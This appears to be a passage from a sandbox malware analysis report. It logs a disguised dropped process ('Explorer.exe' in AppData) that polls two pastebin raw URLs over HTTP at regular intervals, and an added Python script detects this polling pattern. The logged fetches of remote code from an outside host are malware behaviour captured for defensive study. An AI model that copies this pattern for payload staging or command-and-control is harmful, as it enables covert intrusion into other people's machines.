                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            9           192.168.2.5  49861        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:16.595082998 CET  74                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:17.705460072 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:17 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5406c9929422d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            10          192.168.2.5  49866        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:17.835493088 CET  74                 OUT        GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:18.956958055 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:18 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540744d9343f1-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            11          192.168.2.5  49885        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:25.751452923 CET  74                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:26.862850904 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:26 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540a5dcbe4411-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            12          192.168.2.5  49890        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:27.066998959 CET  74                 OUT        GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:28.121633053 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:27 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540ad89420f99-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            13          192.168.2.5  49911        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:34.925534964 CET  50                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:13:36.073672056 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:35 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540df1de042b8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            14          192.168.2.5  49915        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:36.196400881 CET  74                 OUT        GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:37.294008017 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:37 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540e70c67c33b-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            15          192.168.2.5  49934        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:44.159759998 CET  74                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:45.273494959 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:45 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54118ea4117b5-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            16          192.168.2.5  49938        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:45.395200014 CET  74                 OUT        GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:46.809268951 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:46 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54120ba2e42f8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:13:46.921603918 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:46 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54120ba2e42f8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

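The sessions above are the dropped Explorer.exe (PID 7356) fetching the same two pastebin raw pastes over plaintext port 80 every nine seconds or so, with no User-Agent header, and getting a 301 to the https:// URL each time. As an added example that is not part of the Joe Sandbox report, the Python below parses rows in the fused "Timestamp, bytes, OUT/IN, data" layout this section uses and turns that pattern into a finding per paste: poll count, median period, missing User-Agent, and plaintext request redirected to HTTPS. The sample rows are constructed from sessions 5 to 10 with the headers trimmed to Host and Location; the parser assumes rows are in time order and pairs each OUT request with the next IN response.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Constructed sample in the fused "Timestamp<bytes><OUT|IN><data>" layout of this
# report's traffic tables: three polls of each paste, taken from sessions 5-10 above,
# with the response headers trimmed to Location. Assumption: rows are in time order.
SAMPLE_LOG = """\
Dec 9, 2024 14:12:58.160624981 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:12:59.290079117 CET472INHTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/hbwHfEg3
Dec 9, 2024 14:12:59.410897970 CET74OUTGET /raw/KKpnJShN HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:13:00.523938894 CET472INHTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/KKpnJShN
Dec 9, 2024 14:13:07.350838900 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:13:08.560107946 CET472INHTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/hbwHfEg3
Dec 9, 2024 14:13:08.682054043 CET74OUTGET /raw/KKpnJShN HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:13:09.794367075 CET472INHTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/KKpnJShN
Dec 9, 2024 14:13:16.595082998 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:13:17.705460072 CET472INHTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/hbwHfEg3
Dec 9, 2024 14:13:17.835493088 CET74OUTGET /raw/KKpnJShN HTTP/1.1
Host: pastebin.com
Dec 9, 2024 14:13:18.956958055 CET472INHTTP/1.1 301 Moved Permanently
Location: https://pastebin.com/raw/KKpnJShN
"""

# A report row: timestamp, zone, byte count, direction and the first line of the message.
ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(?P<frac>\d+) "
                    r"[A-Z]{3,4}(?P<bytes>\d+)(?P<dir>OUT|IN)(?P<data>.*)$")
PASTE_RE = re.compile(r"^GET (/raw/[A-Za-z0-9]+) HTTP/1\.[01]$")


def parse_messages(text):
    """Split the flattened rows into messages; header lines attach to the preceding row."""
    messages = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
            ts = ts.replace(microsecond=int(m["frac"][:6].ljust(6, "0")))  # ns in report, us here
            messages.append({"ts": ts, "dir": m["dir"], "line": m["data"], "headers": {}})
        elif messages and ": " in line:
            name, value = line.split(": ", 1)
            messages[-1]["headers"][name.lower()] = value
    return messages


def pair_exchanges(messages):
    """Pair each OUT request with the IN response that follows it."""
    pairs, last_req = [], None
    for msg in messages:
        if msg["dir"] == "OUT":
            last_req = msg
        elif last_req is not None:
            pairs.append((last_req, msg))
            last_req = None
    return pairs


def find_paste_polling(pairs, min_polls=3, max_jitter=0.1):
    """One finding per pastebin raw path fetched at a near-constant interval."""
    by_path = defaultdict(list)
    for req, resp in pairs:
        m = PASTE_RE.match(req["line"])
        if m and req["headers"].get("host", "").endswith("pastebin.com"):
            by_path[m.group(1)].append((req, resp))
    findings = {}
    for path, exchanges in by_path.items():
        if len(exchanges) < min_polls:
            continue
        times = [req["ts"] for req, _ in exchanges]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if (max(gaps) - min(gaps)) / period > max_jitter:
            continue  # irregular spacing: not a timer-driven poll
        findings[path] = {
            "polls": len(exchanges),
            "period_s": round(period, 2),
            # no browser omits User-Agent; a bare HTTP client library does
            "no_user_agent": all("user-agent" not in req["headers"] for req, _ in exchanges),
            # plaintext request: the server answers with a 301 to the https:// URL
            "plaintext_redirected": all(
                resp["line"].startswith("HTTP/1.1 301")
                and resp["headers"].get("location", "").startswith("https://")
                for _, resp in exchanges),
        }
    return findings


if __name__ == "__main__":
    for path, finding in find_paste_polling(pair_exchanges(parse_messages(SAMPLE_LOG))).items():
        print(path, finding)
```

The session rows (ID, IPs, ports and PID run together, as in 5192.168.2.549812172.67.19.24807356) are deliberately not parsed: that digit run has several valid splits, so take those fields from the session row by eye rather than trusting a regex. The 50-byte requests in sessions 7, 13 and 17 are the same GET without the Connection: Keep-Alive header; the script treats them like the 74-byte ones, since only the path and Host matter for the finding.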

                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            17          192.168.2.5  49959        172.67.19.24    80                7356  C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp                           Bytes transferred  Direction  Data
                                                            Dec 9, 2024 14:13:53.789258957 CET  50                 OUT        GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:13:54.860887051 CET  472                IN         HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:54 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54154de96efa7-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 18 | Source IP: 192.168.2.5 | Source Port: 49964 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:13:54.984843016 CET | 74 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:56.079979897 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:55 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5415c7a574399-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49985 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:02.907685995 CET | 74 | OUT | GET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:04.005120993 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:03 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5418dfc607274-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49988 | Destination IP: 172.67.19.24 | Destination Port: 80 | PID: 7356 | Process: C:\Users\user\AppData\Roaming\Explorer.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 9, 2024 14:14:04.131097078 CET | 74 | OUT | GET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:14:05.225503922 CET | 472 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:14:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:14:05 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef541959dd67d16-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


